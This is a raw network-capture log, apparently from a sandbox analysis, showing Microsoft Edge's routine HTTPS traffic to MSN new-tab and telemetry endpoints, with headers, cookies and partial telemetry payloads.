                                                                                                                                                                                                                                                                          Set-Cookie: USRLOC=; expires=Sat, 09 Jan 2027 13:55:47 GMT; domain=.msn.com; path=/; secure; samesite=none; httponly
                                                                                                                                                                                                                                                                          Set-Cookie: _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; domain=.msn.com; path=/; httponly
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: HEAD,GET,OPTIONS
                                                                                                                                                                                                                                                                          Content-Security-Policy: child-src 'self';connect-src 'self' *.mavideo.microsoft.com arc.msn.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn browser.events.data.msn.com browser.events.data.msn.cn browser.events.data.microsoftstart.com browser.events.data.microsoftstart.cn business.bing.com/api/ usgov.business.bing.com/api/ cdn.hubblecontent.osi.office.net copilotexplore.azurewebsites.net events-sandbox.data.msn.com events-sandbox.data.msn.cn events-sandbox.data.microsoftstart.com events-sandbox.data.microsoftstart.cn finance-services.msn.com https://*.sharepoint.com/_api/v2.0/ https://*.sharepoint-df.com/_api/v2.0/ https://*.sharepoint.com/_api/v2.1/ https://*.sharepoint-df.com/_api/v2.1/ https://bingretailmsndata.azureedge.net/msndata/ https://browser.pipe.aria.microsoft.com/Collector/ https://dev.virtualearth.net/REST/v1/Imagery/ https://dev.ditu.live.com/REST/v1/Imagery/ https://ecn.dev.virtualearth.net https://jsconfig.adsafeprotected.com https://g.bing.com https://msx.bing.com https://pet [TRUNCATED]
                                                                                                                                                                                                                                                                          X-Robots-Tag: noindex
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1
                                                                                                                                                                                                                                                                          X-UA-Compatible: IE=Edge;chrome=1
                                                                                                                                                                                                                                                                          x-fabric-cluster: pmeprodeus
                                                                                                                                                                                                                                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]},{"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://deff.nelreports.net/api/report"}]}
                                                                                                                                                                                                                                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5}
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=1209600; includeSubDomains; preload
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Prefers-Color-Scheme, Device-Memory, Downlink, ECT, RTT, Sec-CH-DPR
                                                                                                                                                                                                                                                                          X-Ceto-ref: 677fd56391374a508837e2bc9ec5e487|AFD:9EF29122716B4FF4973CE09148CE2062|2025-01-09T13:55:47.088Z
                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                          X-MSEdge-Ref: Ref A: 9EF29122716B4FF4973CE09148CE2062 Ref B: BL2AA2030104019 Ref C: 2025-01-09T13:55:47Z
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:46 GMT
                                                                                                                                                                                                                                                                          Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.8  49896        131.253.33.203  443               5504  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-09 13:55:47 UTC  2070               OUT        GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ntp.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Service-Worker: script
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":15,"imageId":"BB1msyCI","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: serviceworker
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; MUIDB=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5f98fa1c-3184-4abd-971b-0ba246537bf7; ai_session=nz8yh1TyTd8zxc9wX2nCTq|1736430943700|1736430943700; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z
2025-01-09 13:55:47 UTC  1432               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                          Content-MD5: 4h4pmCwrwxZnvMqZGCDn3w==
                                                                                                                                                                                                                                                                          Last-Modified: Thu, 09 Jan 2025 09:19:40 GMT
                                                                                                                                                                                                                                                                          ETag: 0x8DD308EBEEC7E61
                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                          x-ms-request-id: 6cd098bc-f01e-0086-0d77-6296a6000000
                                                                                                                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                          Akamai-Request-BC: [a=23.48.200.173,b=665426727,c=g,n=US_VA_ASHBURN,o=20940]
                                                                                                                                                                                                                                                                          Server-Timing: clientrtt; dur=0, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                          Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                          Akamai-Server-IP: 23.48.200.173
                                                                                                                                                                                                                                                                          Akamai-Request-ID: 27a99b27
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Service-Worker-Allowed: /
                                                                                                                                                                                                                                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                          Akamai-GRN: 0.adc83017.1736430947.27a99b27
                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                          X-MSEdge-Ref: Ref A: 17E159F3234F4CE5B8818DE49686EFA1 Ref B: BL2AA2010203023 Ref C: 2025-01-09T13:55:47Z
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:46 GMT
                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49905 | 20.110.205.119 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:47 UTC | 1261 | OUT | GET /c.gif?rnd=1736430943704&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=91bab7003b9e458fa0272f5f799db4ac&activityId=91bab7003b9e458fa0272f5f799db4ac&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F3117EF083974E1AAB9B33D6E377E4FB&MUID=0196AA9642C66D0E1944BFF943A46C22 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; SM=T
2025-01-09 13:55:47 UTC | 983 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          ETag: "dda11c98eb61db1:0"
                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                          Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                          Set-Cookie: MUID=0196AA9642C66D0E1944BFF943A46C22; domain=.msn.com; expires=Tue, 03-Feb-2026 13:55:47 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                          Set-Cookie: SRM_M=0196AA9642C66D0E1944BFF943A46C22; domain=c.msn.com; expires=Tue, 03-Feb-2026 13:55:47 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                          Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 16-Jan-2025 13:55:47 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                          Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 09-Jan-2025 14:05:47 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:46 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 42
2025-01-09 13:55:47 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49912 | 13.89.178.27 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:47 UTC | 1026 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430945908&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 10861
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
2025-01-09 13:55:47 UTC | 10861 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:55:45.905Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"5f98fa1c-3184-4abd-971b-0ba246537bf7","epoch":"1502638108"},"app":{"locale
2025-01-09 13:55:47 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=567f92b11cff4a9081fd491426fe0a99&HASH=567f&LV=202501&V=4&LU=1736430947705; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:55:47 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: MS0=6bce174238484df5935865df7eac0881; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:25:47 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          time-delta-millis: 1797
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:47 GMT
                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49913 | 13.89.178.27 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:47 UTC | 1025 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430945913&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 4757
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
2025-01-09 13:55:47 UTC | 4757 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:55:45.913Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"5f98fa1c-3184-4abd-971b-0ba246537bf7","epoch":"1502638108"},"app":{"locale
2025-01-09 13:55:47 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=765cb6d2be6a4f74950e3021e29532f3&HASH=765c&LV=202501&V=4&LU=1736430947738; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:55:47 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: MS0=9e3425f3cc5145bfb14bcd1a72d22abc; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:25:47 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          time-delta-millis: 1825
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:47 GMT
                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49921 | 13.89.178.27 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:48 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430946567&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 5391
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; msnup=
2025-01-09 13:55:48 UTC | 5391 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:55:46.566Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"5f98fa1c-3184-4abd-971b-0ba246537bf7","epoch":"1502638108"},"app":{"locale
                                                                                                                                                                                                                                                                          2025-01-09 13:55:48 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=b20958b3914e481da19ad0da8e2b0f23&HASH=b209&LV=202501&V=4&LU=1736430948641; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:55:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: MS0=126b0ba2ebe444bab4f0c340435c71e2; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:25:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          time-delta-millis: 2074
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:48 GMT
                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49924 | 13.89.178.27 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:48 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430946922&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 9892
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; msnup=
2025-01-09 13:55:48 UTC | 9892 | OUT | Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 35 3a 34 36 2e 39 32 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 66 39 38 66 61 31 63 2d 33 31 38 34 2d 34 61 62 64 2d 39 37 31 62 2d 30 62 61 32 34 36 35 33 37 62 66 37 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 30 32 36 33 38 31 30 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-09T13:55:46.921Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"5f98fa1c-3184-4abd-971b-0ba246537bf7","epoch":"1502638108"},"app":{"loc
2025-01-09 13:55:48 UTC | 890 | IN | HTTP/1.1 204 No Content
